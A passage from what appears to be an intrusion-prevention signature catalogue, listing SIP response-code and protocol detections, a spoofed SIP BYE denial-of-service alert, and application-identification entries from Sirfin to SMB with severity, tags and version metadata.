About this situation: Matches when a SIP response with 501 Not Implemented response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-502-Bad-Gateway

About this situation: Matches when a SIP response with 502 Bad Gateway response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-503-Service-Unavailable

About this situation: Matches when a SIP response with 503 Service Unavailable response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-504-Server-Time-Out

About this situation: Matches when a SIP response with 504 Server Time-out response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-505-Version-Not-Supported

About this situation: Matches when a SIP response with 505 Version Not Supported response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-513-Message-Too-Large

About this situation: Matches when a SIP response with 513 Message Too Large response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-580-Precondition-Failure

About this situation: Matches when a SIP response with 580 Precondition Failure response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-600-Busy-Everywhere

About this situation: Matches when a SIP response with 600 Busy Everywhere response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-603-Decline

About this situation: Matches when a SIP response with 603 Decline response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-604-Does-Not-Exist-Anywhere

About this situation: Matches when a SIP response with 604 Does Not Exist Anywhere response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-606-Not-Acceptable

About this situation: Matches when a SIP response with 606 Not Acceptable response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Shared-Variables

About this situation: Shared variables for other situations
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1049-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SIP_Spoofed-Bye-Request

About this situation: SIP BYE request was received from unknown source
Context: SIP without parameters
Severity: 8
Tags: Potential Denial of Service
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-481-5211
Description: SIP BYE request for an existing call was received from a source that did not participate in call establishment. This could indicate a denial of SIP service attempt by a malicious third party tearing down existing SIP calls. Risk analysis: Risk level is medium.
Back to top

SIP_TCP-Client-Syntax-Correct

About this situation: SIP protocol detected
Context: SIP TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Description:
Back to top

SIP_TCP-Server-Syntax-Correct

About this situation: SIP protocol detected
Context: SIP TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Description:
Back to top

SIP_UDP-Client-Syntax-Correct

About this situation: SIP protocol detected
Context: SIP UDP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Description:
Back to top

SIP_UDP-Server-Syntax-Correct

About this situation: SIP protocol detected
Context: SIP UDP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Description:
Back to top

Sirfin

About this situation: Application Sirfin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SIRFIN-PA's supply covers, with a system integration approach, the whole life cycle of information systems, from strategic consulting, design, implementation, dissemination and customer care. The company's supply fields are
Back to top

SiriusXM

About this situation: SiriusXM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1764-5242
Description: SiriusXM usage detected
Back to top

Sironta

About this situation: Application Sironta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sironta is a P2P collaborative tool used for exchanging, creating and editing documents that require teamwork.Sironta connects two or more users without making any network changes to share files of any type and any size from anywhere in the world without violating the terms of confidentiality or the NDA that such documents may have. It is not browser-dependent and can be used even when you are not on-line.As a global application it runs smoothly on Windows, Linux or Mac OS.
Back to top

Sisense

About this situation: Application Sisense detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sisense is the business analytics software that covers data analysis, data preparation and visualization.
Back to top

Sita

About this situation: Application Sita detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SITA deliver and manage sophisticated business solutions for air transport, global distribution systems and government customers over the world's most extensive network.
Back to top

Site-Meter

About this situation: Application Site-Meter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Site Meter provides counter and tracking information tools and services for web sites. Its real time website tracking and counter tools give access to information and data about sites audience.
Back to top

Site24x7

About this situation: Application Site24x7 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Site24x7 is a cloud infrastructure monitoring service that helps monitor the uptime and performance of websites, online applications, servers, private, public clouds,mobile websites and custom APIs.
Back to top

Site5

About this situation: Application Site5 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Site5 provides website hosting. Hosting packages include shared hosting, reseller hosting, VPS hosting and dedicated hosting.
Back to top

Siteapps

About this situation: Application Siteapps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Siteapps- is the Optimization Command Center for the SMB Website
Back to top

SiteDirector-Shopping-Cart

About this situation: Application SiteDirector-Shopping-Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QuillDesign provides customizable, open sourced shopping cart software built on CFMX with feature rich, robust administration interface.
Back to top

SiteDocs

About this situation: Application SiteDocs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SiteDocs lets to complete all your safety forms and documents on mobile devices from the field. Login online to track and monitor safety activity.
Back to top

SiteGround

About this situation: Application SiteGround detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SiteGround is a web hosting company and servicing domains world-wide. It provides shared hosting, cloud hosting and dedicated servers.
Back to top

SiteHawk

About this situation: Application SiteHawk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SiteHawk provides cloud-based chemical data management and SDS solutions focused on improving hazard communications and compliance.
Back to top

Sitrion

About this situation: Application Sitrion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sitrion - mobilize your workforce, stay connected and be more productive with enterprise mobile, social and collaboration tools and HR self-service solutions.
Back to top

Sizmek

About this situation: Sizmek usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-769-5211
Description: Sizmek is an online advertisement service.
Back to top

Skatetalk-Home

About this situation: SkateTalk Home usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Skilljar

About this situation: Application Skilljar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skilljar - video-based learning management system for online training.
Back to top

Skillmeter

About this situation: Application Skillmeter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skillmeter Testing Platform helps recruiters measure candidates skills through online tests.
Back to top

Skillotron

About this situation: Application Skillotron detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Skillotron.com is an endless community-based quiz about IT. Players can both answer and ask questions.
Back to top

Skimlinks

About this situation: Skimlinks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Skimlinks is a content monetisation platform for online publishers that specialises in in-text, contextual advertising. Source: Wikipedia.
Back to top

Skire

About this situation: Application Skire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skire is the industry in providing cloud-based solutions for managing capital projects, facilities and real estate. Skire's Unifier system has helped manage over 300 billion in capital projects and over three billion square feet of facilities and real estate. Become Oracle
Back to top

Skorozvon

About this situation: Application Skorozvon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Service solves problems of active sales department, for organizing and cold telemarketing proring automates telephone sales.
Back to top

Skrill

About this situation: Application Skrill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skrill is an e-commerce business that allows payments to be made through the Internet.
Back to top

Skubana

About this situation: Application Skubana detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skubana is a cloud software to manage inventory, and build a multi-channel e-commerce.
Back to top

Sky-Go

About this situation: Sky GO usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to watch live and on-demand video content from their computer, mobile, or Xbox. Source: Wikipedia
Back to top

Skyhigh-Networks

About this situation: Application Skyhigh-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skyhigh Networks' cloud security software helps businesses discover the services employees are using, analyze risk, and enforce security policies.
Back to top

SkyLedger

About this situation: Application SkyLedger detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SkyLedger helps to work with bookkeeping and accounting.
Back to top

Skylight

About this situation: Application Skylight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skylight Healthcare Systems help hospitals transform the patient experience and enhance patient care.
Back to top

Skymid

About this situation: Application Skymid detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skymid - all in one hosted hotel manament system
Back to top

Skype

About this situation: Endpoint Context Agent based Skype
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Skype endpoint application has been detected.
Back to top

Skype

About this situation: Skype traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1646-5242
Description: This application identifies Skype network usage, but is not sufficient alone to completely block Skype.
Back to top

SkyPrep

About this situation: Application SkyPrep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Skyprep - online training software. Upload existing content, create quizzes, and track employee progress with easy-to-use reporting tools.
Back to top

Skyrock

About this situation: Skyrock usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Skyscanner

About this situation: Skyscanner usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-630-5211
Description: Skyscanner is a passenger flight, hotel and car hire search engine that allows users to browse for flights, hotels and cars via price and location. Source: Wikipedia
Back to top

Skytap

About this situation: Skytap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1764-5242
Description: Skytap is an enterprise service for developing and testing virtualized applications in the cloud.
Back to top

Slack

About this situation: Endpoint Context Agent based Slack
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Slack endpoint application has been detected.
Back to top

Slack

About this situation: Slack usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Slack is a messaging application that helps teams of people collaborate in real-time. Source: Wikipedia
Back to top

Slacker

About this situation: Slacker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to create and share customized music stations by web, mobile applications, and other devices. Source: Wikipedia
Back to top

SLAManagement

About this situation: Application SLAManagement detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SLAManagement is a foodservice management company serving private and charter school meal programs.
Back to top

Slashdot

About this situation: Slashdot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Discussion Forum, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-769-5211
Description: Slashdot is a source for technology related news.
Back to top

SlateBox

About this situation: Application SlateBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SlateBox - suite of tools for Instant Collaboration
Back to top

Sleek-Bill

About this situation: Application Sleek-Bill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sleek Bill is an invoicing software.
Back to top

Sleekr

About this situation: Application Sleekr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sleekr is designed and built to help small and medium businesses manage their HR and Accounting.
Back to top

Slickdeals

About this situation: Slickdeals usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Slickdeals features crowdsourced deals and coupons from retailers such as Amazon, eBay, Walmart and Macy's.
Back to top

SlickDNS

About this situation: Application SlickDNS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SlickDNS is a managed DNS hosting provider with the following features
Back to top

Slickplan

About this situation: Application Slickplan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Slickplan is an elegant, intuitive sitemap tool for building picture-perfect sitemaps. Use it to plan a new website, create a process flowchart, or nail any project needing information architecture.
Back to top

Slide

About this situation: Slide usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Sliderocket

About this situation: SlideRocket usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: This platform allows users to create, manage, share and measure presentations. SlideRocket is provided via a SaaS model offered via monthly or annual subscription plans. Source: Wikipedia
Back to top

Slides

About this situation: Application Slides detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Slides is a place for creating, presenting and sharing presentations. The Slides editor is available right in your browser. Unlike traditional presentation software, like PowerPoint, there's no need to download anything.
Back to top

SlideShare

About this situation: SlideShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: SlideShare offers its users the ability to upload and share publicly or privately PowerPoint presentations, Word documents and Adobe PDF Portfolios.
Back to top

SlideShare-Upload

About this situation: SlideShare upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-630-5211
Description: SlideShare offers its users the ability to upload and share publicly or privately PowerPoint presentations, Word documents and Adobe PDF Portfolios.
Back to top

SlideShark

About this situation: Application SlideShark detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SlideShark is the cloud-based app used to show PowerPoint presentations from the iPad, iPhone and iPod. It allows to business users to share slides online or broadcast them live over the web and track audience viewing results.
Back to top

Sling TV

About this situation: Sling TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1665-5242
Description: Sling TV is a streaming television service. This application situation is meant for blocking the application.
Back to top

Slingbox.com

About this situation: Application Slingbox.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Slingbox makes it simple to access your live and recorded shows, movies and sports. Slingbox connected at home and Slingplayer on your mobile device, you are in control of your TV experience.
Back to top

SlowDNS

About this situation: SlowDNS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-856-5242
Last changed: sgpkg-ips-1022-5242
Description: SlowDNS is VPN over DNS tunnel application for Android.
Back to top

Small-Improvements

About this situation: Application Small-Improvements detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Small Improvements delivers software for intranet and human resources usage. The focus is to making great teams awesome, by helping employees provide and receive feedback that actually helps them improve.
Back to top

Smallpdf

About this situation: Application Smallpdf detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smallpdf is a platform that allows to convert and edit PDF files.
Back to top

Smart-Turn

About this situation: Application Smart-Turn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Supply chain management software and services from JDA Software provide planning, optimization and execution solutions span the entire supply chain from materials to the consumer, leveraging the powerful heritage and knowledge capital of integrated brands.
Back to top

SmartAdServer

About this situation: SmartAdServer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Description: SmartAdServer is a web advertisement platform
Back to top

SMARTASSISTANT

About this situation: Application SMARTASSISTANT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SMARTASSISTANT provides a technology for interactive product advice for online shops, brands, and service providers.
Back to top

SmartAuction

About this situation: Application SmartAuction detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartAuction is Internet auction that offers access to a virtual inventory of wholesale vehicles for eligible dealers of all brands.
Back to top

SmartBen

About this situation: Application SmartBen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartBen is a provider of software and services for employee benefits administration for business and health insurance exchanges.
Back to top

Smartbrief

About this situation: SmartBrief usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: SmartBrief provides free e-mail based news summaries and other content for industry associations, professional organizations, advocacy groups and their constituents.
Back to top

SmartCart

About this situation: Application SmartCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartCart is a secure online ordering system for businesses and individuals who sell products and services on the Internet.
Back to top

SmartDraw

About this situation: Application SmartDraw detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartDraw software make presentation-quality flowcharts, org charts, floor plans and any other chart or diagram.
Back to top

Smartertravel.com

About this situation: SmarterTravel.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: SmarterTravel.com is the largest online travel resource for unbiased travel news, deals, and timely expert advice.
Back to top

Smartface

About this situation: Application Smartface detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smartface is the cross-platform mobility framework with Android/iOS EMULATOR and WYSIWYG editor to develop NATIVE apps for iOS and Android with JavaScript.
Back to top

SmartFile

About this situation: SmartFile usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-630-5211
Description: SmartFile provides file storage and FTP services to its users via a web FTP interface.
Back to top

SmartFocus

About this situation: Application SmartFocus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The MessageCloud from SmartFocus enables marketers to own every customer moment, through smart and crowd insights, email, personalization and push messaging across any device, all on one platform.
Back to top

Smartimage

About this situation: Application Smartimage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smartimage is a service that helps to centralize and share brand. It helps view analytics to see what's being viewed, shared, and downloaded for logos, photographs, graphics, videos, presentations.
Back to top

SmartLead

About this situation: Application SmartLead detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartLead is a lead management company focused on getting the right leads, to the right people, at the right time. Offer a unique set of tools and services in the marketplace, including
Back to top

Smartling

About this situation: Application Smartling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smartling consolidates the many moving parts of translation into a single, automated, cloud-based platform for ultimate efficiency and accuracy.
Back to top

Smartly-io

About this situation: Smartly.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1764-5242
Description: Smarly.io usage detected. Smartly.io is a tool manage Facebook advertising.
Back to top

SmartQ

About this situation: Application SmartQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartQ is an agile project management app built around a visual task board. It allows you to distribute work, track its progress and collaborate with your team online.
Back to top

SmartRecruiters

About this situation: Application SmartRecruiters detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartRecruiters provides platform that transforms enterprises into recruitment marketing and sales.
Back to top

SmartScreen

About this situation: Endpoint Context Agent based SmartScreen detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft SmartScreen endpoint application was detected. SmartScreen is a cloud-based security feature in Microsoft Windows.
Back to top

Smartsheet

About this situation: Smartsheet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Smartsheets core functionality includes Recording and organization of data,Unlimited or free collaborators , Notifications, alerts, and emails Task management, Gantt charts, Web forms, and reports, File sharing and Crowdsourcing management. Smartsheet combines functions found in Microsoft Excel, Project, Access, and Sharepoint into a single application.
Back to top

Smartsupp

About this situation: Application Smartsupp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smartsupp is a live chat for your website, it provides conversations with your web visitors, answer their questions and boost your online sales.
Back to top

SmartVault

About this situation: Application SmartVault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartVault - secure cloud drive and easy-to-use online document storage solution for going paperless and working in the cloud.
Back to top

SmartVoice

About this situation: Application SmartVoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartVoice is a provider of hosted communications and managed voice services to the Small to Medium Business
Back to top

Smartytask

About this situation: Application Smartytask detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smartytask is a web-based productivity application for implementing Getting Things Done. It works in your web browser and lives on our secure servers, so you can access it anywhere with nothing to download or SYNC.
Back to top

SmartZip

About this situation: Application SmartZip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartZip's predictive marketing platform combines the power of big data and predictive analytics with precision, multichannel marketing.
Back to top

SMB

About this situation: SMB traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1190-5242
Description: SMB is a protocol that is used to access shared resources such as files and printers over a network..
Back to top

SMB-TCP_-Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow

